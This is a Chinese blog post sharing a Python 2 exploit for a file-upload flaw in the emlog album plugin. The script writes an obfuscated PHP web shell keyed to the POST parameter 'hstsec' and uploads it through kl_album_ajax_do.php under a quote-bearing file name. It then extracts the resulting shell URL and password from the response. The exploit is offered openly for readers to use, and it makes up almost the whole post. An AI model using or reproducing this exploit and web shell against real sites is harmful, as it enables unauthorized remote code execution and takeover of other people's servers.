昨天本站转载了emlog相册插件的漏洞分析文章,当然也有html版的getshell代码,喜欢的同学们可以直接用昨天文章中分享的代码。为了练习python,小弟用python又重写了一次,喜欢的同学们也一起研究一下吧。其实也比较简单。

#!/usr/bin/env python# -*- coding: gbk -*-# -*- coding: utf_8 -*-# Date: 2015/12/30# Created by 小胖博客# 博客 http://www.4848438.com/import sys, os, re, timetry: import requestsexcept ImportError: raise SystemExit('\n[!] requests模块导入错误,请执行pip install requests安装!')def usage(): # os.system(['clear', 'cls'][os.name == 'nt']) print '+' + '-' * 60 + '+' print '\t Python emlog相册插件getshell exploit' print '\t Blog:http://www.4848438.com/' print '\t\t Code BY: 小胖博客' print '\t\t Time:2015-12-30' print '+' + '-' * 60 + '+' if len(sys.argv) != 2: print '用法: ' + os.path.basename(sys.argv[0]) + ' EMLOG 网站地址' print '实例: ' + os.path.basename(sys.argv[0]) + ' http://www.4848438.com/' sys.exit()def getshell(url): ''' emlog相册插件上传getshell函数 :param url: emlog url地址 :return: 返回得到的shell地址 ''' up_url = url + 'content/plugins/kl_album/kl_album_ajax_do.php' shell = "<?php @preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'($_POST[\"hstsec\"])','a');?>" filename = "oneok'.php" with open(filename, 'wb') as shellok: shellok.write(shell) files = { 'Filedata': (filename, open(filename, 'rb'), 'text/json'), 'album': (None, 'waitalone.cn') } try: up_res = requests.post(up_url, files=files).content shellok = re.findall(re.compile(r'(?<=\.\./).+?(?=\',)'), up_res) except Exception, msg: print '\n[x] 发生错误了,卧槽!!!:', msg else: if shellok: return url + shellok[0]if __name__ == '__main__': usage() start = time.time() url = sys.argv[1] if url[-1] != '/': url += '/' ok = getshell(url) try: os.remove('oneok\'.php') except Exception: print '\n[x] 删除临时文件失败,请手工删除!' if ok: print '\n[!] 爷,人品暴发了,成功得到Shell:\n\n%s 密码:%s' % (ok, 'hstsec') else: print '\n[x] 报告大爷,本站不存在此漏洞!' print '\n报告爷,脚本执行完毕,用时:', time.time() - start, '秒!'